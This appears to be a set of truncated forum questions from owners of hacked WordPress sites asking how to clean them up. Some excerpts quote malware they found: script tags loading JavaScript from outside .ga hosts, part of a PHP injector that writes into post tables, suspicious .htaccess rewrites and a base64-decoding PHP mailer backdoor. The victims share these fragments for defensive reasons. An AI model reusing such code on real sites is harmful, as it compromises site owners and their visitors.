site been hacked, and all posts been injected a line of js code under the content! <script src='https://js.xxxxxxx.ga/stat.js?n=ns1' type='text/javascript'></script> I have found the malware file in the root directory, which inject the JS code with the command: $q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'"; $result = $conn->query($q); if ($result->num_rows > 0) { while($row = $result->fetch_assoc()) { $q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." LIMIT 1 "; $result2 = $conn->query($q2); if ($result2->num_rows > 0) …

I do have a problem on my WordPress site. In the frontend there is a spam post (not a comment, a post) visible to everybody. I don't know where it comes from and all malware scans were negative so far. However, in order to solve this problem I will need to delete this post. But it can't be seen in the backend. As you can see on the given screenshot the posts area shows "all posts" with the number of …

Today we noticed that one of our website has started showing random Google Ads on our website when we have not added any Google Ads to our website. I would appreciate if someone can help in case they have faced such scenario. I am not sure at this point if website is hacked or shared hosting server is compromised. Any points or steps i should follow to get rid of these ads on website

I have been searching at this site posts about blogs being hacker, but I haven't find something like this. One of our Editor's account has started to publish random posts. Our first thought was his password being stolen, so we changed it and we told him not to log in for a certain time. Random posts appeared again at the next day. We tried yesterday to change his role to Subscriber, so he doesn't have permission to post. Random posts …

In many WordPress websites functions.php file is automatically erased. I checked every file. I scanned files on server but no file is infected. After an interval of time website response white page, when I checked functions.php it empty. Why this is happening. Is it a server problem?

I've been doing WP for over a decade now, and have fixed / remediated my share of hacks. However this one really has me stumped.. I have a site running on updated, patched, and pretty darn secure WordPress. For context, it used to NOT be so secure before I took over hosting it. It used an old theme, Experon Pro (this will come into play later) before I rebuilt it in 2020. Now to the hack -- The site has …

I have recently migrated several sites to a new server using easyengine, which created a separate set of docker images for each WP website. Internally on my server, each of these sites gets a private IP (172.x.x.x) and externally of course domains are routed via dns to the external server named and served up normally. I noticed that a couple of my migrated sites are experiencing failed logins (shown in the activity log plugin) that have no referrer and seem …

I'm trying to clean up a WordPress website that's been hacked. I noticed that the .htaccess file has some suspect looking regular expressions, but my regex skills are pretty weak (time to learn I guess). I've tried replacing the .htaccess file with the default WordPress .htaccess, but it gets rewritten immediately and automatically. What I need to know is what's going on with this code: # BEGIN WordPress <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*..*$ ?$1$3=$2&%{QUERY_STRING}[L] RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)=[0-9]+$ ?$2$1=$3&%{QUERY_STRING}[L] …

I was about to submit my wordpress auto-generated sitemap to Google Search Console but I realized my sitemap contains weird links and it doesnt contain any of my actual pages. I checked example.com/sitemap.xml and example.com/wp-sitemap.xml and example.com/sitemap_index.xml. They all contain different weird links like : <url> <loc>https://example.com/armrests71n79/jsxc93911899.htm</loc> </url> <url> <loc>https://example.com/ferocebotc/iq39894629.htm</loc> </url> <url> <loc>https://example.com/hairspraysp6/ekqpmh46441760.htm</loc> </url> And this is just 3 of them. There are almost 1000 links like this and my site actualy has just 27 pages. Extra information: I recieved …

I am very sorry about the length of the post, please bear with me as I am going to try and list everything I've done so far. I am dealing with a hacked WordPress site which had been left without updates for quite a while now and the passwords were weak.. Also, no backups. The website uses Enfold Theme. So here goes! I've deleted most of the plugins. Among the ones that remain are Fastest cache, which was there, plus …

In my 13 years of Wordpress, I've never seen anything like this. About an hour ago I was alerted by one of my users that the website was displaying an Internal Server Error 500 message on every page. I consulted my host's tech support, and they were unable to determine the cause. I then noticed that I had about 20 comments in the moderation queue, all of which are very suspicious (see screenshot). I have no idea what to do. …

Website has been hacked and they have injected javascript into every single post, page and product (woocommerce) - Editing every page manually would take for ever, we have over 3000 posts. Is there a simple find and replace we could use to remove this javascript?

My wordpress site got hacked, I fixed the problem but had to delete the TwentyFifteen theme (the one that was hacked). The theme I was originally using was different, but the hackers hacked the TwentyFifteen theme. When I deleted the theme, I went back to the wordpress dashboard and see this: As you can see it's not recognizing any theme and I can't activate them. Also the Homepage is blank. Any ideas on how to activate a theme via FTP? …

My wordpress website has been hacked, once recovered i can't seem to view the footer. I have checked the theme options / widgets and the settings seems fine. Kindly advise on possible causes and solutions. website address: www.boltonuniform.co.za

I have a website built on WordPress. The URL ia www.travelmakerismymiddlename.com At some point, the website started redirecting randomly - I cannot tell you which link or page specifically redirects, as it is completely random. The issue is, I have tried everything that I know of, and it still redirects. The latest thing I have tried is downloading the files from the host server and scanning them for malware. I tried Malwarebytes but no malware was found. I could not …

I want to add a security feature to my WordPress website to stop direct access to files added to the root of WordPress installation, recently I discovered that a malicious plugin added some files to send email. Below is the malicious php code added. <?php $method = $_SERVER['REQUEST_METHOD']; switch ($method) { case 'GET': //Here Handle GET Request echo '###ERROR 404'; exit; break; case 'POST': //Here Handle POST Request foreach($_POST as $key => $x_value) { $data = base64_decode($x_value) ; $to_data = …

After a site of a friend has been hacked I told him he should just clean up the mess and restart from scratch so he know that no file has been altered. I could scan the site for him with tools like grep an so on (For a start: Grep and Friends) but what I wondered about is, how to scan the database? What if some hacker has placed payload inside the database. Can be something simple like XSS or …

My Wordpress site has been hacked and every post has had <script src='https://crow.lowerthenskyactive.ga/m.js?n=ns1' type='text/javascript'></script> added to the end of each post which I need to remove. I have 375 posts I need this removing from I have tried UPDATE wp_posts SET post_content = REPLACE (post_content, '<p style="text-align: center;"><img src="http://i.imgur.com/picture.jpg" alt="" /></p>', ''); from the How to mass delete one line from all posts and substituted it with the following query I'm thinking it has something to do with the ' …

I would like to inform and request help from the community. What happens is this malware was in the folder / wp-content / uploads / 2020 / Named index.php And I found him in the year 2017 in the uploads folder. What I find strange is that it was not detectable by any online database and not even the Sucuri plugin, Wordfense .. Follow the code (Good part of it was deleted, due to not fit in the post) Below …

Am using 'WP Offload SES Lite' Plugin to collect Question & Answer through forms. But yesterday I was receiving thousands of mail in a single day continuously. I think someone tried to hack the site. Can you please tell me how to protect from these kinds of attacks?